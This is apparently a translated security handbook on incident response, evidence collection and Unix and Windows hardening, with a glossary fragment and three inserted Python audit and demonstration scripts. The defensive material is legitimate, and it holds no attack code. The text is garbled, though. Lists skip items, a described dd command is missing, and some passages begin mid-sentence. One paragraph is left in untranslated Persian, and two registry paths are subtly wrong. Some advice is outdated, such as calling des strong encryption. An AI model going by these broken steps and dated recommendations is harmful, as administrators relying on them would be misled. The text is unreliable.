If you want to prosecute the attackers (assuming, of course, that you have found them), you need evidence showing that a crime took place. Even if you do not intend to take any legal action, collecting evidence can help you reconstruct what happened.
There are many ways of collecting evidence. Below are several methods that appear to be useful.
1. Collect the data held in the system's memory. On Unix this is done with the dd command:
3. Archive a copy of the key files that were left behind or modified by the attacker, and copy this archive to several computers.
4. Write the modified files to a CD or optical disk.
5. Run the command "arp -a" or "arp -v" so that you have in front of you the contents of the ARP table, which can indicate recent network connections.
6. If your web site has been defaced, save those HTML pages on your hard disk. Use a screen capture tool so that you can save a copy of how those pages appear on the display.
7. Make copies of images that reflect the current state of the compromised system. In X Window, xwd is used for this purpose, and in Microsoft Windows, the Print Screen key.
8. Obtain the MD5 message digest of every image or file you recover. Print this MD5 on paper, sign it, date it, and place it in your logbook. Later you can use this MD5 to make sure that the evidence has not changed.
There are a number of commercial products that are useful for collecting evidence, such as high-speed disk duplication programs,[342] and network forensic analysis tools (NFATs)[343] that archive all of the packets entering and leaving the organization.
If you have involved law enforcement officials, consult them before you start collecting evidence on your own.
New Accounts
After an intrusion, look for new accounts and delete every account that was created by the attacker. You may want to make a paper record of these accounts before deleting them, so that you can prosecute the attacker (if you can find him, of course).
find out using nmap or another port scanner, run from an uncompromised machine on the same network. (From a security point of view, of course, it is better for the compromised machine to be disconnected from the network while it is being examined.)
You may also need to scan the entire file system to see which files and directories were accessed around the time of the attack. Doing this may give you clues about what happened. For example, if the compiler, the loader[344] and the libraries have access times that are close together, you can conclude that the attacker probably compiled a program.
ﺍﮔﺮ ﻓﺎﻳﻠﻲ ﺭﺍ ﺑﺎﺯ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭ ﺁﻥ ﺑﻪ ﺩﻧﺒﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﺑﮕﺮﺩﻳﺪ ،ﺯﻣﺎﻥ ﺁﺧﺮﻳﻦ ﺩﺳﺘﺮﺳﻲﺍﺵ ﻋﻮﺽ ﻣﻲﺷﻮﺩ ﻭ ﺩﻳﮕﺮ ﻧﺨﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﺍﻟﮕﻮﻫـﺎﻱ
ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺗﺤﻘﻴﻘﺎﺕ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺩﻳﺴﻚ ﻛﻪ ﺑﺼﻮﺭﺕ ﻓﻘـﻂ ﺧﻮﺍﻧـﺪﻧﻲ
mountﺷﺪﻩ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ .ﺍﮔﺮ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﺩﻭﻡ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻨﺎﺳﺐ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺭﻳﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﻛـﻪ
ﺍﻏﻠﺐ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻛﻪ partitionﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺳﺘﻔﺎﺩﺓ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ mountﻛﻨﻴﺪ )ﺍﺣﺘﻤﺎ ﹰ
ﻻ
ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻭﺍﺳﻂ ﻛﺎﺭﺑﺮﻱ ﺑﺎﺯﮔﺸﺘﻲ( .ﺗﺤﻘﻴﻘﺎﺕ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ،ﺍﻣﺎ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﺗﻨﻈﻴﻤـﺎﺕ ﻫـﻢ ﺍﺟـﺮﺍﻱ
ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﻋﺚ ﺧﻮﺍﻫﺪ ﺷﺪ ﻛﻪ ﺁﺧﺮﻳﻦ ﺯﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻓﺎﻳﻠﻬﺎ ﻭ ﺗﻤﺎﻡ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﻣﺸﺘﺮﻙ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ )ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ
ﻫﻤﻪ partitionﻫﺎ ﺭﺍ ﻣﺠﺪﺩﹰﺍ mountﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ!( .ﺩﺭﻧﺘﻴﺠﻪ ﺑﻬﺘﺮﻳﻦ ﻛﺎﺭﻱ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻧﺠﺎﻡ ﺩﻫﻴـﺪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﻳـﺴﻜﻬﺎ ﺭﺍ ﺭﻭﻱ ﻳـﻚ
ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ mountﻛﻨﻴﺪ ﻭ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻧﺠﺎ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ.
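An added example, not part of the handbook: the following Python script builds the access-time timeline described above using only lstat(), which reads metadata without opening files, and refuses to walk a tree that is not mounted read-only. The directory layout, file names, and incident time in demo() are constructed for illustration.

```python
import os
import stat
import tempfile
from datetime import datetime, timedelta, timezone


def is_readonly_mount(path):
    """True if the file system that holds `path` is mounted read-only."""
    return bool(os.statvfs(path).f_flag & os.ST_RDONLY)


def access_timeline(root, incident, window, require_readonly=True):
    """Return sorted (atime, path) pairs for regular files under `root`
    whose last-access time lies within +/- `window` of `incident`.

    Only lstat() is called on files: it reads the inode and never opens the
    file, so file access times are left alone. Listing directories can still
    update *directory* atimes on a read-write mount, which is why the walk
    is refused unless the evidence is mounted read-only.
    """
    if require_readonly and not is_readonly_mount(root):
        raise RuntimeError(f"{root} is not mounted read-only; refusing to walk it")
    lo = (incident - window).timestamp()
    hi = (incident + window).timestamp()
    hits = []
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # metadata only, symlinks not followed
            except OSError:
                continue                     # damaged entry: skip, keep going
            if stat.S_ISREG(st.st_mode) and lo <= st.st_atime <= hi:
                hits.append((st.st_atime, path))
    return sorted(hits)


def demo():
    """Build a constructed tree in which compiler, loader and library were
    touched within two minutes of the incident, then run the timeline."""
    incident = datetime(2005, 7, 1, 3, 0, tzinfo=timezone.utc)   # constructed
    offsets = {                                                  # constructed
        "usr/bin/cc": timedelta(seconds=60),
        "usr/bin/ld": timedelta(seconds=90),
        "usr/lib/libc.so": timedelta(seconds=120),
        "home/alice/notes.txt": -timedelta(days=30),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, off in offsets.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
            t = (incident + off).timestamp()
            os.utime(path, (t, t))           # set atime and mtime explicitly
        # The temporary directory is writable, so the read-only guard is
        # switched off for the demonstration only.
        hits = access_timeline(root, incident, timedelta(minutes=10),
                               require_readonly=False)
        return [os.path.relpath(p, root) for _, p in hits]


if __name__ == "__main__":
    for rel in demo():
        print(rel)
```

On real evidence, leave require_readonly at its default and point root at the read-only mount of the disk copy.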
[345] For this purpose you can use tripwire or develop custom software of your own.
The next step is to make a printed copy of all the relevant logs that are available to you (for example, computer and network logs) and examine them to understand what unauthorized actions the intruder carried out. You should also find out whether anything unusual has happened on the system since the intruder's entry. These logs can help you understand what programs the intruder ran and what actions he took. Do not forget to date and sign every printed page individually.
Remember that the time at which an intrusion is discovered is not necessarily the time at which it began. In one case, the evidence showed that the actual intrusion had begun two years before it was discovered! Naturally, after that much time there was no trustworthy backup or software on the system. In fact, throughout that period the intruders had been making many changes to the system, including installing patches and upgrades! In this case one could say that the intruders were administering the system better than the person or people responsible for it!
3. If you know the specific IP address that the attacker used as the source of the attack, search all of your log files for records of that address.
If you suspect that a flaw in a piece of system software caused the intrusion, you can contact its vendor for advice, since vendors usually have solutions for common problems. In many cases, if your contract with the vendor includes after-sales support, or if you are one of its major customers, you can expect this contact to be fruitful.
You can also look at recent postings on the web sites and mailing lists of security groups. New vulnerabilities are usually discussed in great detail in these places. In some cases the information on these sites is wrong or dangerous, so be very careful about what you read.
Finally, you may want to contact a good FIRST team. FIRST teams usually have a good view of new intrusions, mainly because of the large number of reports they receive. Being in contact with a representative of one of these teams can produce good results and give you valuable guidance on what you need to check before returning the system to service. However, some teams have rules under which they cannot explicitly give anyone much information about current vulnerabilities, so as to give the vendor concerned the opportunity to release a fix. Consequently, you may not be able to obtain complete information from these sources.
Damage control
Once you have restored your system, check what other damage exists that you need to control. First, look at the after-effects of the intrusion and consider any criminal consequences of it. For example, was private information copied during the intrusion? If so, you should consult your legal counsel and decide what you want to do at this stage.
You need to determine which of the following concerns deserve the most attention and what you want to do about each of them:
1. Do you need to file a formal report with law enforcement, a legal office, an insurance company, or the manufacturers and vendors of the products you use?
2. Should you dismiss one or more employees of your organization or take disciplinary action against them? Should you train your employees in order to prevent such incidents in the future?
3. Do you need to update your "disaster recovery" plan to make use of the lessons of this incident?
4. Do you need to inspect and correct the software or configuration of the systems under your control or of other affiliated sites?
5. Should your public relations office publish an official report on this matter (inside or outside the organization)?
Your answers to the questions above can differ completely depending on your organization's situation and the significance of the security incident.
Chapter Ten
Platform-Specific Notes
Overview
Most of the material in this book can be applied to any type of hardware or operating system. In this part we turn to specific technical recommendations for the Unix and Linux, Microsoft Windows, and MacOS 7-9 operating systems. (Material related to MacOS X is included in the Unix section.)
Unix and Unix-like operating systems [346]
In the past, Unix-based systems were deployed in large, multi-user, time-sharing environments, or in clusters of workstations with a network file system. Today, Unix-based systems are increasingly used as single-user workstations or servers.
Because there are many different versions of Unix-like operating systems, many security mechanisms are specific to a particular Unix version, and you should read the documentation for the particular version of Unix that you use. Several good books, web sites, and mailing lists on Unix security are listed in Appendices Two through Five of this book.
file access is the same for a number of users, "user groups" should be used.
On Unix-like systems, the root user (whose UID is zero) is the "superuser" and can usually change any aspect of the system. Given this, protecting the root account and the processes that run with root privileges is of particular importance in the security of Unix systems. Avoid using the root account for routine, everyday activities, disable its ability to log in to the system, and when you need to use the root account, use the su command (or a variant of it such as sudo) to raise your access level from that of an ordinary user account to that of the root account. In this way you can make use of logging, and an attacker will also be forced to compromise two user accounts in order to gain superuser access. Obviously you should also restrict the use of commands such as su; on some systems only users in the wheel group can use su.
[346] Throughout this section the terms "Unix" and "Unix-based systems" are used with the same meaning. Although the word Unix is generally used, this information also applies to Linux and other Unix variants.
Some versions of Unix can even restrict the powers of the root user during normal system operation by using capabilities or kernel security levels. Check your product's documentation and, if it has this feature, use it. If you have sensitive data files, it is best to encrypt them and keep them on removable media, so that they are not disclosed if the root account is compromised. Note that if the decryption program is also on the same system, encrypting the files is of no use, because an attacker with superuser access can use that program to obtain a decrypted copy of the files as well.
Unix treats all computer devices as files. For example, printers, serial ports, hard disks, and even system memory can be accessed through device files. Although device files generally reside in the /dev directory, a user with sufficient privileges (usually the superuser) can create them anywhere. If an unauthorized user can read from system memory, he can gain access to other users' sensitive information; and if he can write to system memory, he can compromise the system. Similar precautions must be applied to devices that manipulate disk data in raw form (without the involvement of the file system) and to many other kinds of devices. Check your system and make sure that the ownership and permissions of device files are correct. If you can mount your file system in such a way that devices on it are disabled (as nodev), use this feature wherever possible. On some systems there is a file named logindevperm or fbtab that controls how device permissions change when a user logs in at the console itself (and not remotely) (for example, to prevent a remote user from turning on the microphone and monitoring the room). If such a file exists on your system, make sure that it is configured correctly.
Encryption
There are several commands in Unix for making data unreadable, but they are not suitable for encryption. Do not use rot13 or crypt, because they are easily broken. On many systems, strong encryption is available through the des command or the openssl programs and libraries. For stronger checksums, do not rely on the sum command; instead, use md5, md5sum, or openssl to produce cryptographic digests.
TCP/IP networks
Unix systems are often used for network applications and services. Many network services are started by inetd (or xinetd). Review this daemon's configuration files and disable unnecessary services; protect the remaining services with the TCP wrapper daemon, tcpd, unless inetd itself supports TCP wrappers. At system startup, other network services are started through the files in the /etc/init.d or /etc/rc*.d directories or through the /etc/rc and /etc/rc.local files. If you do not use a service, disable it. Pay particular attention to services such as fingerd that give outsiders information about the system or its users.
Every Unix system should have its own host-based firewall for filtering packets. Consult your system's documentation to learn whether a firewall is available and how to use it. The usual firewall configuration tools are ipfw, ipchains, and iptables. These firewalls should be configured to pass only packets that are destined for services you intend to offer. An external firewall should also be used to prevent outsiders from accessing protocols and services that you offer inside your organization (such as SNMP, NFS, NTP, LPD, Samba, RIP). Use static routing where possible.
In the past, many standard services performed authentication using the client's host name or IP address, or with passwords that were sent in plaintext over network connections. None of these methods is secure. Programs should use cryptographic approaches with shared keys or public keys for authentication. Today the authentication of many programs (telnet, rlogin, rcp, rsh, ftp) can be disabled so that secure shell (ssh), which has a strong authentication mechanism, is used in place of all of them. Do this, and delete from the .rhosts and /etc/hosts.equiv files all lines that specify the IP addresses of trusted machines. Compile other services (pop, imap, http, ldap) with the OpenSSL libraries so that they use SSL/TLS connections with clients and passwords are therefore not sent unencrypted.
Where possible, run network services under non-root user accounts. Many network daemons can be configured to start as root (so that they can bind to a port below 1024, since on most Unix systems this requires root privileges) and then drop their privileges and continue running under the account of a user other than root. Instead of using a single shared account for daemons (nobody), give each daemon a non-root account of its own. If possible, confine network services in a chroot environment so as to minimize the damage if they are compromised.
If you offer anonymous FTP service, use an up-to-date version of the FTP daemon. Do not place your real /etc/passwd file in the FTP area. Make sure that the list in /etc/ftpusers of users who may not connect to FTP includes users such as root, uucp, bin, and every other account that does not belong to a real person. Always be vigilant about the permissions and ownership of the directories in the FTP area. Configure incoming directories so that they do not allow downloads and outgoing directories so that they prevent uploads, and review the FTP logs regularly.
If possible, use postfix, exim, or qmail instead of sendmail as your mail server. Do not run any version of your MTA program other than the latest. Use mail aliases to ensure that mail for valid non-user accounts is delivered to a real user; in other words, make sure that mail to the root, postmaster, and abuse addresses is delivered. Protect the mail aliases file against changes by unauthorized persons. If you have mail aliases that deliver mail to programs or files, examine them carefully and remove them if possible.
If you have multi-user machines, be sure to run the authd and identd daemons on them. Doing so is useful when you receive a report that someone has used your systems as an intermediary to attack another system. Use versions that return encrypted identifiers, so as to avoid disclosing your users' information outside the system.
If you do not use RPC, disable the portmapper daemon; if you do use it, restrict access to it and use the securenets feature if it is available. Disable every RPC service offered by inetd that you do not use (and especially rexd). If Secure RPC is available on your system, use it. The only reasonable foundation for NFS and NIS+ is Secure RPC. Avoid using NIS, or NIS+ in compatibility mode. If you need NFS, use version 3 of it in TCP mode, and limit the number of file systems that can be exported and the set of hosts that can mount them. Try to export file systems read-only. NFS does not allow files owned by root to be changed by root on the client machine unless you have explicitly specified otherwise. It is therefore better for the root account to be the owner of all exported files and directories, rather than another account (such as bin) whose namesake may also exist on the client.
If you use X11, use the strongest possible authentication mechanism. Kerberos and "Secure RPC" are strong authentication systems, "Magic Cookies" is weaker than they are, and the xhost program offers the lowest level of security. Tunneling X11 connections through SSH also provides good protection.
If you offer SMB service through Samba, prefer "user" or "domain" security over "share" security. Enable encrypted passwords, and use Samba's "min protocol" option to force clients to use the latest version of the SMB protocol. Do not use the "admin user" option, or if you do, map the DOS archive bit to "executable" (in Unix). Also learn how to use the "veto files" option.
Do not take your eyes off your network. Review the output of netstat and lsof regularly to see what network connections have been made to and from your system. Use who and last to see user connections. Probe your system from the outside with nmap, Nessus, ISS, and other network security scanners to find potential vulnerabilities that need to be fixed. For some machines, the best course may be to isolate them from the network completely.
Many Unix systems come with a number of user accounts for separating file and process ownership privileges, such as daemon, bin, uucp, and so on. Make sure that the encrypted-password field for all of these accounts begins with the character "*", so that access to them is not possible with any password. Below you can see a fragment of an /etc/shadow file:
root:$1$24g7KF8j$Rjky384Fd1PvtSCOJ/WW.1:12264:0:99999:7:::134551156
bin:*:10890:0:99999:7:::
daemon:*:10890:0:99999:7:::
adm:*:10890:0:99999:7:::
lp:*:10890:0:99999:7:::
sync:*:10890:0:99999:7:::
shutdown:*:10890:0:99999:7:::
halt:*:10890:0:99999:7:::
In this example only the root account has a valid password, and no one can log in to the other accounts (although root can assume their privileges with the su command if necessary). Many systems can be configured so that passwords expire after a set period of time, to protect against an attacker's indefinite use of an account without its owner's knowledge. Choose a lifetime of between one and six months for your passwords. On many systems you can require passwords to meet particular conditions (in terms of length, variety of characters, and so on). Systems that support this capability usually provide it through PAM.
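An added example, not part of the handbook: this Python script audits /etc/shadow entries for the two points made above, that service accounts must have a locked password field and that login passwords should expire within one to six months. The first four sample lines are the handbook's; the lp and sync lines, the finding names, and the treatment of a leading "!" as locked (common on Linux) are assumptions of this example.

```python
# First four lines: the handbook's fragment. Last two: constructed failures.
SAMPLE_SHADOW = """\
root:$1$24g7KF8j$Rjky384Fd1PvtSCOJ/WW.1:12264:0:99999:7:::134551156
bin:*:10890:0:99999:7:::
daemon:*:10890:0:99999:7:::
adm:*:10890:0:99999:7:::
lp::10890:0:99999:7:::
sync:$1$constructed$notarealhashvalue000000:10890:0:99999:7:::
"""

# "*" is the marker the handbook names; "!" is an assumption of this example.
LOCK_PREFIXES = ("*", "!")


def parse_shadow(text):
    """Split shadow lines into dicts. Field order: name, password, last
    change, minimum age, maximum age, warning, inactive, expire, reserved."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 5 or not fields[0]:
            entries.append({"name": fields[0], "malformed": True})
            continue
        max_age = int(fields[4]) if fields[4].isdigit() else None
        entries.append({
            "name": fields[0],
            "pw": fields[1].strip(),     # tolerate stray spaces around the field
            "max_age": max_age,
            "malformed": False,
        })
    return entries


def audit_shadow(text, login_accounts, min_days=30, max_days=180):
    """Return (account, finding) pairs.

    EMPTY_PASSWORD              nothing in the password field: login needs no password
    SERVICE_ACCOUNT_NOT_LOCKED  an account nobody should log in to has a usable hash
    PASSWORD_LIFETIME           a login account's maximum age is outside min..max days
    MALFORMED                   the line does not have the expected fields
    """
    findings = []
    for entry in parse_shadow(text):
        name = entry["name"]
        if entry["malformed"]:
            findings.append((name, "MALFORMED"))
            continue
        pw = entry["pw"]
        locked = pw.startswith(LOCK_PREFIXES)
        if pw == "":
            findings.append((name, "EMPTY_PASSWORD"))
        elif name not in login_accounts and not locked:
            findings.append((name, "SERVICE_ACCOUNT_NOT_LOCKED"))
        elif name in login_accounts and not locked:
            age = entry["max_age"]
            if age is None or not (min_days <= age <= max_days):
                findings.append((name, "PASSWORD_LIFETIME"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_shadow(SAMPLE_SHADOW, login_accounts={"root"}):
        print(f"{account}: {finding}")
```

Against the handbook's own fragment the only finding is root's 99999-day lifetime, which is the "never expires" setting the paragraph above advises against.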
Not using default and guest accounts is a good practice, but if you are obliged to use them, use the restricted shells rsh or rbash so that they are limited to running a small number of commands (do not confuse this with the remote shell client named rsh). Take care that none of those commands provides access to an unrestricted shell (as many editors do).
Processes and memory
The ps command shows the processes running on the system (on BSD-based versions, the command ps -auxw, and on SVR5-based versions, the command ps -elf). Each process has a "process ID number" that is used in commands that operate on running processes.
Keep an eye on users' running processes. Use programs such as top and lsof to check regularly which processes are running on the system and who started them. Enable process accounting so that you have a record of the processes that have run on the system in the past and of the users who have consumed a large amount of processor time.
The nice and renice commands are used to lower a process's CPU priority and are useful for long-running background jobs. In addition, root can use nice to raise the CPU priority of processes. This is useful when users' processes have slowed the system down and root needs more CPU time.
The kill command is used to send signals to processes. Some signals are used to notify daemons of a change in the system, or to tell them to re-read their configuration file in order to apply new settings. Other signals can be used to suspend or terminate processes. The TERM signal (which is sent by default with "kill process-id" or explicitly with "kill -TERM process-id") usually terminates the process; and the KILL signal ends the process unconditionally. The TSTP signal suspends a process, and is useful when you want to take an image of the process's memory with the gcore command for investigation, or when self-replicating processes have filled the entire process table. In the second case, you can first suspend every process and then kill them all at once, so that they can no longer spawn and reproduce.
Unix systems support virtual memory (traditionally known as swap space). When the processes on the system need more memory than the available RAM, disk space that has been allocated to swap is used. Make sure that you have enough swap space on your disk partitions. (Some Unix systems can also swap to files on partitions with standard file systems, although performance suffers.)
Disks
In addition to the quota system, separate critical partitions from partitions that may fill up accidentally or deliberately (such as the mail spool or partitions dedicated to file uploads). Make sure that each partition has enough space and inodes for storing files. Monitor disk usage, and encourage users to archive old files to compact and optical disks and to delete them from the hard disk.
Microsoft operating systems
Microsoft operating systems began with an emphasis on individual computers and without networking in mind, but after a short time they came to be used on networks as well (first using proprietary protocols and then TCP/IP). Systems based on Windows 3.x and Windows 95/98/ME are generally suited to being client workstations; by contrast, systems based on Windows NT (including Windows 2000 and Windows XP) are often configured as servers and have far more advanced security controls.[353] The differences between versions of Windows can be disastrous. If you are in an environment that uses several different versions of Windows, each version needs its own particular attention and measures. This part of the book focuses primarily on hardening systems based on Windows NT.
As with other operating systems, nothing is as useful for getting to know Windows as reading the manual, but other books, web sites, and mailing lists devoted to Windows security can also offer you rich and plentiful material. Microsoft's web site includes a large security section with many useful documents and tools, including the Baseline Security Analyzer, a program that analyzes the configuration of Windows NT-based systems and makes recommendations for strengthening it. It is recommended that you run this program from time to time.
[353] Contrary to expectation, DOS systems are also, in some circumstances, a suitable choice for use as servers. Because they are single-user systems and have few vulnerabilities, they are a very suitable choice for single-purpose log servers, terminals, firewalls, and even DNS.
Cryptography
Microsoft Windows provides an integrated library called CryptoAPI to support cryptography. On the NTFS file system, files and directories can be encrypted with the cipher.exe tool, which creates a transparent encrypted file system (Transparent EFS). EFS is based on public-key encryption, so users can access their encrypted data by presenting the appropriate private key. In addition, EFS can be configured so that if a key is lost, the system administrator can recover the encrypted data. (Depending on policy, this may raise or lower the level of security.)
TCP/IP networks
Before TCP/IP became widespread, Microsoft Windows supported a peer-to-peer Ethernet networking model (NetBIOS over the NetBEUI transport protocol). The remnants of NetBIOS can be seen in Microsoft's printing and file-sharing services, which are implemented as NetBIOS over TCP/IP (sometimes known as NBT). This file-sharing protocol is called Server Message Block (SMB) or CIFS. RFCs 1001 and 1002 describe NetBIOS over TCP/IP in detail.
NetBIOS has its own authentication and host-name-resolution protocols. In the simplest model, NetBIOS hosts (nodes) find one another and register their names on the network using broadcast packets. In addition to a scalability problem on large networks, this method has a major security problem: any node can easily steal a registered name and pass itself off as that name's owner.
A safer mode is for NetBIOS nodes to communicate point-to-point with hosts that have been designated as NetBIOS name service nodes (sometimes known as WINS servers) and to use them for name registration and name lookup, and to communicate with datagram distribution nodes for broadcasts at the NetBIOS level. NetBIOS name servers provide protection against name spoofing by machines. In addition, the value of the key
\HKEY_LOCAL_MACHINE\CurrentControlSet\Services\Netbt\Parameters\NoNameReleaseOnDemand
in the registry can be set to 1 to prevent servers from responding to name-release requests (which may have been sent by an attacker in order to obtain a server's name and pass himself off as that server).
In many cases, users who wish to use a resource must first log on to the SMB server that holds that resource. In newer versions of SMB, the logon process uses challenge-response authentication. When a user requests to log on, the SMB server sends a unique text string to the client as a challenge. The client encrypts this string using a session key that is computed from the cryptographic hash of the user's password, and returns it to the SMB server as the response. The SMB server performs the same operation and compares the result with the client's response. If the two are identical, the user is authenticated. The exact form of the computation depends on the SMB dialect in use; at present two main dialects (LM and NT) are defined.
Note that this means that the SMB server (or another authentication server with which it communicates) holds the hashes of users' passwords (but not the plaintext passwords). If this server falls into attackers' hands, the hashes of all users' passwords are exposed (and the attacker may be able to pass himself off as one of the users and connect to the SMB server). On the other hand, this approach has the advantage that the password, whether in plaintext or in hashed form, never crosses the network. Consequently, the SMB authentication server must be protected in the same way as Kerberos domain controllers.
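An added example, not part of the handbook: a Python model of the challenge-response logon described above, showing why the password never crosses the network and why the server's stored hashes must be guarded as if they were passwords. HMAC-SHA256 and SHA-256 stand in for the real LM/NT computations, and the class, function, and account names are hypothetical.

```python
import hashlib
import hmac
import secrets


def password_hash(password):
    """Stand-in for the LM/NT hash: what the server stores instead of the password."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def respond(key, challenge):
    """Response = keyed digest of the challenge under the password-derived key."""
    return hmac.new(key, challenge, hashlib.sha256).digest()


class AuthServer:
    def __init__(self):
        self.hashes = {}     # user -> stored password hash (never the plaintext)
        self.pending = {}    # user -> challenge that is still outstanding

    def enroll(self, user, password):
        self.hashes[user] = password_hash(password)

    def challenge(self, user):
        nonce = secrets.token_bytes(16)      # unique per logon attempt
        self.pending[user] = nonce
        return nonce

    def verify(self, user, response):
        nonce = self.pending.pop(user, None)  # each challenge is usable once
        stored = self.hashes.get(user)
        if nonce is None or stored is None:
            return False
        # The server repeats the client's computation and compares the results.
        return hmac.compare_digest(respond(stored, nonce), response)


def run_exchange():
    server = AuthServer()
    server.enroll("alice", "correct horse")   # constructed credentials
    wire = []                                 # every message that crosses the network

    c1 = server.challenge("alice"); wire.append(c1)
    r1 = respond(password_hash("correct horse"), c1); wire.append(r1)
    valid_login = server.verify("alice", r1)

    c2 = server.challenge("alice"); wire.append(c2)
    r2 = respond(password_hash("wrong guess"), c2); wire.append(r2)
    wrong_password = server.verify("alice", r2)

    c3 = server.challenge("alice"); wire.append(c3)
    replayed_response = server.verify("alice", r1)   # old response, new challenge

    # The stored hash is all the computation needs: whoever holds the server's
    # hash table can answer challenges without knowing any password. This is
    # why the handbook says the authentication server needs the same
    # protection as a Kerberos domain controller.
    c4 = server.challenge("alice")
    stored_hash_alone = server.verify("alice", respond(server.hashes["alice"], c4))

    secrets_to_find = (b"correct horse", password_hash("correct horse"))
    secret_on_wire = any(s in msg for msg in wire for s in secrets_to_find)

    return {
        "valid_login": valid_login,
        "wrong_password": wrong_password,
        "replayed_response": replayed_response,
        "stored_hash_alone": stored_hash_alone,
        "secret_on_wire": secret_on_wire,
    }


if __name__ == "__main__":
    for name, value in run_exchange().items():
        print(f"{name}: {value}")
```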
If you do not use Windows file sharing, disable "NetBIOS over TCP/IP" completely in the advanced TCP/IP settings. If all of the machines on the network support the newer versions of the NetBIOS/SMB protocols, you should configure them to respond only to requests that are based on the latest version of the protocol (in most cases NTLMv2), so as to prevent attackers from exploiting vulnerable older versions. If remote administration is not needed for managing the file system, set the key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareWKS
in the registry to 0 to disable it.
Windows can be configured so that remote users have access not only to files but also to registry keys. This security permission is set on the key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurePipeServers\winreg
and determines which users can modify the registry remotely. If you need remote access to the registry, this group should include only system administrators; otherwise it should include no one. The remote registry access service can also be disabled entirely.
The advanced TCP/IP settings for network adapters on Windows NT-based systems include a simple packet filter that passes UDP or TCP packets on the basis of their destination port, and that can also filter non-IP packets.
Processes and memory
Through Task Manager, Windows processes can be monitored and terminated, and the priority of processes can be changed to one of six levels, from "Low" to "Realtime". Task Manager can also display the memory used by each process. Because Windows systems are rarely used in multi-user, time-sharing environments, memory and process exhaustion attacks are usually carried out by a visible program that can be detected through Task Manager and removed from memory.
Disks
NTFS has a quota system that can be used to keep disks and partitions from filling up. This feature, too, is mostly useful for client workstations, because servers usually have no users other than system administrators, and server programs also usually need administrative privileges to run.
Network
Windows NT-based systems have many registry settings for preventing some kinds of network denial-of-service attacks, such as SYN floods; but in many cases these settings are not enabled by default. The settings that you should check are located under \HKEY_LOCAL_MACHINE\CurrentControlSet\Services\Tcpip\Parameters and their keys are SynAttackProtect, TcpMaxHalfOpen, and TcpMaxHalfOpenRetried.
Other kinds of denial-of-service attacks can be made much more difficult by disabling the "automatic detection and discovery" feature. To keep the system from reacting strangely to abnormal network conditions, the keys EnablePMTUDiscovery, EnableDeadGWDetect, and EnableICMPRedirects should be set to 0. Interfaces should also be configured so that they do not search for routers automatically and always use static, predefined routes.
Appendices
Appendix 1
Glossary of Terms
Penetration testing
One of the examinations that is usually performed as part of certifying a system, during which evaluators try, by deceiving the security system, to discover ways of penetrating the various layers of the system's resources.
Vulnerability
A flaw or weakness in the design, implementation, or operation of a system that can be exploited by attackers and lead to a violation of the system's security policy.
Spying tool
A program used by attackers to steal passwords and other data.
Internet service provider (ISP)
A company through which an individual or organization gains access to the Internet. Typically, in addition to providing Internet access, ISPs also offer e-mail and web hosting services. Some ISPs also offer off-site data storage and support services.
Stateful evaluation
A method that blends proxy and filtering technologies, alternating between them depending on the existing threats or the need for speed.
Trojan horses
A computer program that appears to have a useful and legitimate function, but that also contains a hidden and possibly malicious function which, sometimes by exploiting the system on which it is installed, may be able to circumvent security mechanisms.
Data Encryption Standard (DES)
